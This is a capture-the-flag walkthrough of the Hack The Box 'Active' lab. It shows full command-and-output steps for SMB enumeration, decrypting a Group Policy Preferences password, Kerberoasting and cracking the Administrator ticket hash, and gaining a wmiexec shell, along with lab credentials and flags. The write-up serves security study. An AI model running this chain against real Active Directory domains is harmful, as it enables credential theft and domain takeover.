HTB Active done

Active¶

OS:¶

Windows

Technology:¶

Kerberos
LDAP
SMB

IP Address:¶

10.10.10.100

Open ports:¶

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-03 20:35:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC

Users and pass:¶

active.htb\SVC_TGS
GPPstillStandingStrong2k18

active.htb\Administrator
Ticketmaster1968

Nmap¶

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ cat 10.10.10.100_nmap_vulns.nmap| grep open              
# Nmap 7.93 scan initiated Mon Apr  3 16:35:18 2023 as: nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.100_nmap_vulns 10.10.10.100
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-03 20:35:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC

Add record to /etc/hosts¶

┌──(root㉿kali)-[~]
└─# echo "10.10.10.100 active.htb" >> /etc/hosts

List all sharename - SMB¶

└─$ smbclient -L //10.10.10.100 | tee 10.10.10.100_smbclient_list
Password for [WORKGROUP\kali]:do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

Read file "Groups.xml" from Replication¶

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active]
└─$ smbclient //10.10.10.100/Replication | tee list_share_replication

Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.6 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (15.5 KiloBytes/sec) (average 3.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (3.3 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (6.4 KiloBytes/sec) (average 4.2 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (21.0 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \>

Download Groups.xml¶

```┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ smbclient //10.10.10.100/Replication Password for [WORKGROUP\kali]: Anonymous login successful Try "help" to get a list of possible commands. smb: > get \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml getting file \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as \active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec) smb: >


## Read file Replication

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ cat Groups.xml


## Decrypt Groups Poliy Preferences string (password)

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ GPPstillStandingStrong2k18


# List all share for user "svc-tgs"

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100 | tee list_share_svc_tgs [+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON READ ONLY Logon server share Replication READ ONLY
SYSVOL READ ONLY Logon server share Users READ ONLY


# List all remote user

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ /home/kali/.local/bin/GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100 /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: [*] Querying 10.10.10.100 for information about domain. Name Email PasswordLastSet LastLogon

Administrator 2018-07-18 15:06:40.351723 2023-04-04 09:56:47.239349 Guest
krbtgt 2018-07-18 14:50:36.972031
SVC_TGS 2018-07-18 16:14:38.402764 2018-07-21 10:01:30.320277


# Kerberoasting
## Identification of configured SPNs and extraction of hash

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ /home/kali/.local/bin/GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation

active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-04-04 09:56:47.239349

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ /home/kali/.local/bin/GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation

active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-04-04 09:56:47.239349

[-] CCache file is not found. Skipping... $krb5tgs$23$Administrator$ACTIVE.HTB$active.htb/Administrator$3e774fe4c5a823276c214c2e477c0d85$bbe3bfc9d44519cd6fe8f2315a8d44d7f9e0518dbb542a3dbbf17c33726aff9c2688d63c60cc5d8fb27ed2ecebe1710362e8bfcb5f6169098151e11a012dd6119e9bbcae3cedac251b618a01801a0edcc4e875eab60ea5c515600bde97751620b50504795269955212053fc037f17086583761ba986bfa293dfb3a3801244e151d0d219ae0132ef9ba5e6aa443963afb9102a5a6e72d88009fed317469d560c9f64fc2512774e55916afb78927ac5e70b9a4a5f2f20c23c08fe661e571ea2353477a4048cb062f0df74f9baea9c3480b62accd04378738ba9dacea77e33990860b09fa48cc78335bf26f319745cafac26059306e20a231f9803ccba7eaef7bf5643b9726c737c0d478e46740d19cc36784e9dbfb3b5c33fe181ce6e3c70535172dac9729be05230946d4cfbfdb35ab1da9d000ba96b816015dfbd2395563adf24f50c1ad62317a528b360e60c836e519f7742a3ba9030ccd59422486c89485fef982007c01099e4ad9dfa202ba96871e8feedf5a1ca2d9d55daf038b9b2efae9208c9a73437b40509ec71ab86a7efc9f05ee0fa424554b0ba6a21054b203fd2389996934c21068417823def2a29f248aa61f59ce93bd22663e5f4fa912c083466e04019199d12f72a2e152e3ddc893da7f32b17e098d78f2e233a2093990bab9ca11757cf214f0c49c5c187bfb5fd9c4e197be7a3605a5a53badde12f8e0b004d2a7f4198925e6ae61ba16540a09d92902b4afcaccdcf9d52fb44ed825b67b11e6168b96514a20f45d8c634b128fdf562d115706a051e0eadfcae8a48a24a7d58fb372f042e54cd3abf73a6cffce9e258071c69b6d6433bd585405f6ffbfab61d663f34785bb2ffae1f7f146f4ad666cbee70f58eb4212bf768c362a9769350867762564defd7e9070d014c4f8a45ace18e0571727d3ac6b4e52524059ddec50ba3780731993a9e4695656dceca4c4d0df4cddda07807ba720d9a1fc083a889aefa29f0d2ca5a5ab5684d64c8b9ce792a0612e9fe698da2e23573970f9a967b4be3505e31641ebf3b614362913c610926ab78eddbcbf2b3f287d8a9d85fae2e7a1164b73dcb1c7b0e5424e3b32ad743b32c65e7995b21c4071572fc26857fa4d5d9cf3f3ea953fb3652ddec2debaf1b34df7ddda5315be92cc638df8462d223033c1e909628913226005851f04542c0bea7110e1cea39c1bd19c277a5148d7d0f3691551f5a76e032aec2fb5bc70e4ae1964658fe61d71059506


## Cracking of Kerberos TGS Hash

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ hashcat -m 13100 TGS_hash.txt /usr/share/wordlists/rockyou.txt --show | tee TGS_hash_hashcat.txt $krb5tgs$23$Administrator$ACTIVE.HTB$active.htb/Administrator$3e774fe4c5a823276c214c2e477c0d85$bbe3bfc9d44519cd6fe8f2315a8d44d7f9e0518dbb542a3dbbf17c33726aff9c2688d63c60cc5d8fb27ed2ecebe1710362e8bfcb5f6169098151e11a012dd6119e9bbcae3cedac251b618a01801a0edcc4e875eab60ea5c515600bde97751620b50504795269955212053fc037f17086583761ba986bfa293dfb3a3801244e151d0d219ae0132ef9ba5e6aa443963afb9102a5a6e72d88009fed317469d560c9f64fc2512774e55916afb78927ac5e70b9a4a5f2f20c23c08fe661e571ea2353477a4048cb062f0df74f9baea9c3480b62accd04378738ba9dacea77e33990860b09fa48cc78335bf26f319745cafac26059306e20a231f9803ccba7eaef7bf5643b9726c737c0d478e46740d19cc36784e9dbfb3b5c33fe181ce6e3c70535172dac9729be05230946d4cfbfdb35ab1da9d000ba96b816015dfbd2395563adf24f50c1ad62317a528b360e60c836e519f7742a3ba9030ccd59422486c89485fef982007c01099e4ad9dfa202ba96871e8feedf5a1ca2d9d55daf038b9b2efae9208c9a73437b40509ec71ab86a7efc9f05ee0fa424554b0ba6a21054b203fd2389996934c21068417823def2a29f248aa61f59ce93bd22663e5f4fa912c083466e04019199d12f72a2e152e3ddc893da7f32b17e098d78f2e233a2093990bab9ca11757cf214f0c49c5c187bfb5fd9c4e197be7a3605a5a53badde12f8e0b004d2a7f4198925e6ae61ba16540a09d92902b4afcaccdcf9d52fb44ed825b67b11e6168b96514a20f45d8c634b128fdf562d115706a051e0eadfcae8a48a24a7d58fb372f042e54cd3abf73a6cffce9e258071c69b6d6433bd585405f6ffbfab61d663f34785bb2ffae1f7f146f4ad666cbee70f58eb4212bf768c362a9769350867762564defd7e9070d014c4f8a45ace18e0571727d3ac6b4e52524059ddec50ba3780731993a9e4695656dceca4c4d0df4cddda07807ba720d9a1fc083a889aefa29f0d2ca5a5ab5684d64c8b9ce792a0612e9fe698da2e23573970f9a967b4be3505e31641ebf3b614362913c610926ab78eddbcbf2b3f287d8a9d85fae2e7a1164b73dcb1c7b0e5424e3b32ad743b32c65e7995b21c4071572fc26857fa4d5d9cf3f3ea953fb3652ddec2debaf1b34df7ddda5315be92cc638df8462d223033c1e909628913226005851f04542c0bea7110e1cea39c1bd19c277a5148d7d0f3691551f5a76e032aec2fb5bc70e4ae1964658fe61d71059506:Ticketmaster1968


# Login to remote host - Administrator

┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ /home/kali/.local/bin/wmiexec.py active.htb/Administrator:[email protected] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv2.1 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:>whoami active\administrator

C:>whoami /priv

PRIVILEGES INFORMATION¶

Privilege Name =============================== SeIncreaseQuotaPrivilege SeMachineAccountPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeSystemProfilePrivilege SeSystemtimePrivilege SeProfileSingleProcessPrivilege SeIncreaseBasePriorityPrivilege SeCreatePagefilePrivilege SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege SeRemoteShutdownPrivilege SeUndockPrivilege SeEnableDelegationPrivilege SeManageVolumePrivilege SeImpersonatePrivilege SeCreateGlobalPrivilege SeIncreaseWorkingSetPrivilege SeTimeZonePrivilege SeCreateSymbolicLinkPrivilege Description State
============================================================== ======= Adjust memory quotas for a process Enabled Add workstations to domain Enabled Manage auditing and security log Enabled Take ownership of files or other objects Enabled Load and unload device drivers Enabled Profile system performance Enabled Change the system time Enabled Profile single process Enabled Increase scheduling priority Enabled Create a pagefile Enabled Back up files and directories Enabled Restore files and directories Enabled Shut down the system Enabled Debug programs Enabled Modify firmware environment values Enabled Bypass traverse checking Enabled Force shutdown from a remote system Enabled Remove computer from docking station Enabled Enable computer and user accounts to be trusted for delegation Enabled Perform volume maintenance tasks Enabled Impersonate a client after authentication Enabled Create global objects Enabled Increase a process working set Enabled Change the time zone Enabled Create symbolic links Enabled


# Read flag: root.txt and user.txt

──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Active] └─$ /home/kali/.local/bin/wmiexec.py active.htb/Administrator:[email protected] Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv2.1 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:>type C:\Users\Administrator\Desktop\root.txt a13b02d67d70a1e31d0be5a1d8805e8b

C:>dir C:\Users\svc_tgs\Desktop\ [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec Volume in drive C has no label. Volume Serial Number is 15BB-D59C

Directory of C:\Users\svc_tgs\Desktop

21/07/2018 06:14 ��

. 21/07/2018 06:14 �� .. 06/04/2023 11:57 �� 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 1.157.074.944 bytes free

C:>type C:\Users\svc_tgs\Desktop\user.txt 6894deabe9928845742728d5c4dabf77 ```